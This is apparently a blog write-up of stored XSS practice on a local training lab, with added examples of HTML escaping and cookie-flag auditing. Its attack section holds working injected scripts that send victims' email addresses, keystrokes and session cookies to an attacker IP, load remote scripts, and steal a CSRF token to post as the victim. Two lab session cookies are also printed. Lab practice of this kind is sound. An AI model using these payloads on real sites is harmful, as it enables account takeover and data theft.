
XSS Vulnerability

Updated
4 min read
XSS Vulnerability

What is XSS?

Cross-site scripting (XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows the attacker to circumvent the same-origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow us to masquerade as a victim user, to carry out any actions that the user can perform, and to access any of the user's data. If the victim user has privileged access within the application, then we might be able to gain full control over all of the application's functionality and data.
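As an added illustration that is not part of the original write-up or of the lab's code, the following Python snippet shows the pattern behind a stored XSS: a post title is interpolated straight into HTML, next to the same rendering with HTML entity encoding applied. The payload, the function names and the sample post are constructed for this example.

```python
import html
import re

# Constructed sample input for this example: a post title carrying a script tag.
MALICIOUS_TITLE = '<script>alert("xss")</script>'
SAFE_TITLE = "Lunch at noon?"


def render_post_vulnerable(title: str, text: str) -> str:
    """Vulnerable pattern: untrusted input is interpolated into HTML verbatim,
    so a title containing <script> becomes part of the page's markup."""
    return f"<h1>{title}</h1><p>{text}</p>"


def render_post_escaped(title: str, text: str) -> str:
    """Hardened form: every untrusted value is entity-encoded for the HTML text
    context before interpolation, so < > & " ' survive only as literal text."""
    return (
        f"<h1>{html.escape(title, quote=True)}</h1>"
        f"<p>{html.escape(text, quote=True)}</p>"
    )


# Opening script tag, case-insensitive; enough to show the difference between
# the two renderings (a real scanner would parse the HTML instead of using a regex).
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_script_tag(markup: str) -> bool:
    """True if the rendered markup still contains an executable <script> tag."""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    for renderer in (render_post_vulnerable, render_post_escaped):
        page = renderer(MALICIOUS_TITLE, "body text")
        print(f"{renderer.__name__}: script tag present = {contains_script_tag(page)}")
        print("   ", page)
```

Entity encoding is specific to the HTML text and attribute contexts; a value placed inside a JavaScript string, a URL or a CSS rule needs the encoding for that context instead. Template engines with autoescaping enabled (Jinja2 in Flask, for example) apply the text-context encoding by default, which is why such bugs usually come from code that bypasses the template engine or marks input as safe.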

Installing and Preparing the Lab

I use secDevLabs to practice this vulnerability.

git clone https://github.com/globocom/secDevLabs
cd secDevLabs/owasp-top10-2021-apps/a3/gossip-world/
make install

Open the web app at http://localhost:10007.

Attacking

Understanding

Verifying XSS Vulnerability

First, we verify whether the website interprets injected script code, that is, whether user input is rendered as HTML without being encoded.


Getting Email Address

Set up an HTTP server on the attacker's device to receive the submitted addresses.

sudo python3 -m http.server 80

Script to be injected.

<script>
    var email = prompt("Please, enter your email address to view the post", "example@example.com");
    if (email == null || email == "") {
        alert("Please, enter a valid email.");
    }
    else {
        fetch("http://192.168.200.128/?email=" + email)
    }
</script>

Key Logger

Set up an HTTP server on the attacker's device and pipe the received keystrokes in real time (the sed filter keeps only the GET lines and turns %20 back into spaces).

sudo python3 -m http.server 80 2>&1 | sed -n '/GET \// { s/%20/ /g; p }'

Script to be injected.

<script>
    var k = "";
    document.onkeypress = function(e) {
        e = e || window.event;
        k += e.key;
        var i = new Image();
        i.src = "http://192.168.200.128/" + k;
    };
</script>

Output of the host server pipe.


Redirecting to an Insecure Website

Script to inject.

<script>
    window.location.href = "https://cxnsxle.hashnode.dev";
</script>

Using External Scripts

We inject a script tag that makes the web app load a script from our server, so the victim's browser executes whatever that script contains (replace SCRIPT from ATTACKER with your script's file name).

<script src="http://192.168.200.128/<SCRIPT from ATTACKER>.js"></script>

We have two users logged in on two different web browsers, Brave and Firefox.

  • cxnsxle user cookie: eyJfY3NyZl90b2tlbiI6Ijc0YjhlYTQ0LTVhMmYtNDAyMy1hMTk4LTk0NWMxZDcxMzM5YiIsInVzZXJuYW1lIjoidGVzdCJ9.ZJzUIg.-qn7ZpitV7hgfPEvWMlkw6VzOuY

  • test user cookie: eyJfY3NyZl90b2tlbiI6ImJiNjk4N2I2LTdiNmEtNDlmYi1hZjllLWY3OTcyMjIyOWRhMiIsInVzZXJuYW1lIjoiY3huc3hsZSJ9.ZJzR-Q.OQaDB3GJqlhJYXNcTexRZvzgI5g

Disable the HttpOnly flag on the test user's session cookie; a cookie with HttpOnly set is not exposed through document.cookie, so the script below would read nothing.
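As an added example, not from the original write-up or from the lab's code, the following Python snippet audits a Set-Cookie response header for the HttpOnly, Secure and SameSite attributes: the check a defender would run against the application's login response to see whether an injected script could read the session cookie at all. The header values in it are constructed placeholders, not the lab's real cookies.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers for this example (placeholder values,
# not the lab's real session cookies).
WEAK_HEADER = "session=abc123.def456; Path=/"
DEFAULT_HEADER = "session=abc123.def456; Path=/; HttpOnly"
HARDENED_HEADER = "session=abc123.def456; Path=/; HttpOnly; Secure; SameSite=Lax"


def audit_set_cookie(header_value: str) -> dict:
    """Parse one Set-Cookie header and list the hardening attributes each cookie lacks.

    HttpOnly keeps the cookie out of document.cookie (what the cookie-theft payload
    relies on), Secure restricts it to HTTPS, SameSite limits cross-site sending.
    """
    jar = SimpleCookie()
    jar.load(header_value)
    report = {}
    for name, morsel in jar.items():
        missing = []
        # Morsel stores flags as True and valued attributes as strings;
        # an unset attribute is "" (or absent on old Pythons), hence .get().
        if not morsel.get("httponly"):
            missing.append("HttpOnly")
        if not morsel.get("secure"):
            missing.append("Secure")
        if not morsel.get("samesite"):
            missing.append("SameSite")
        report[name] = missing
    return report


def readable_by_script(header_value: str) -> list:
    """Names of the cookies in the header that an injected script could read
    via document.cookie, i.e. those without HttpOnly."""
    return [
        name
        for name, missing in audit_set_cookie(header_value).items()
        if "HttpOnly" in missing
    ]


if __name__ == "__main__":
    for label, header in (("weak", WEAK_HEADER), ("default", DEFAULT_HEADER), ("hardened", HARDENED_HEADER)):
        print(f"{label:9s} missing={audit_set_cookie(header)} script-readable={readable_by_script(header)}")
```

If the application is a Flask app (the cookies shown above have Flask's signed-session format), the configuration keys SESSION_COOKIE_HTTPONLY, SESSION_COOKIE_SECURE and SESSION_COOKIE_SAMESITE control these attributes on the session cookie. Note that HttpOnly only protects against cookie theft: the script in the "Being Evil" section below never reads the cookie, it sends requests from inside the victim's session with withCredentials, which HttpOnly does not prevent.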


Script cookieHijacking.js to hijack the test user's cookie.

var request = new XMLHttpRequest();
request.open('GET', 'http://192.168.200.128/?cookie=' + document.cookie);
request.send();

Create an HTTP server to receive the connection from the test user's browser.

sudo python3 -m http.server 80

Then, from the test user's browser, the victim clicks on the post containing the malicious code.
Finally, the test user's cookie can be used to do anything that user can do.


Being Evil

We are going to make any user who views the malicious post unknowingly create a post with impolite content.

  • Let's start by creating the malicious post, containing the malicious code, as the cxnsxle user.

  • Then, we intercept the data sent when creating a new post using Burp Suite.

    The request uses the POST method.

  • Now we create a malicious script that makes the test user's browser create a new impolite post. It first fetches the new-post form to read the CSRF token, then submits the form with the victim's own session, which is why the CSRF token offers no protection here.

      var domain = "http://localhost:10007/newgossip"

      // Step 1: fetch the new-post form with the victim's session to obtain the CSRF token.
      var req1 = new XMLHttpRequest();
      req1.open('GET', domain, false);            // false -> synchronous (waits for the response), true -> asynchronous
      req1.withCredentials = true;
      req1.send();

      var response = req1.responseText;
      var parser = new DOMParser();
      var doc = parser.parseFromString(response, 'text/html');
      var token = doc.getElementsByName('_csrf_token')[0].value;

      // Step 2: submit the form as the victim, using the token just obtained.
      var req2 = new XMLHttpRequest();
      var title_txt = 'MY%20BOSS%20IN%20AN%20IDIOT';
      var subtitle_txt = 'BOSS%20YOU%20ARE%20AN%20ASSHOLE';
      var text_txt = 'My%20boss%20has%20not%20paid%20me%20two%20months%20ago%20and%20he%20is%20an%20asshole%20with%20me';
      var post_data = 'title=' + title_txt + '&subtitle=' + subtitle_txt + '&text=' + text_txt + '&_csrf_token=' + token;
      req2.open('POST', domain, false);            // false -> synchronous (waits for the response), true -> asynchronous
      req2.withCredentials = true;
      req2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
      req2.send(post_data);
    
  • Finally, when the test user views the malicious post, their browser creates an impolite post about their payment.


I appreciate your time reading this write-up 😁 and I hope it has been valuable for your understanding of the topic. Remember that this content does not come 100% from me: writing this article is a way to reinforce what I learned from S4vitar's Hack4u courses 🔥.
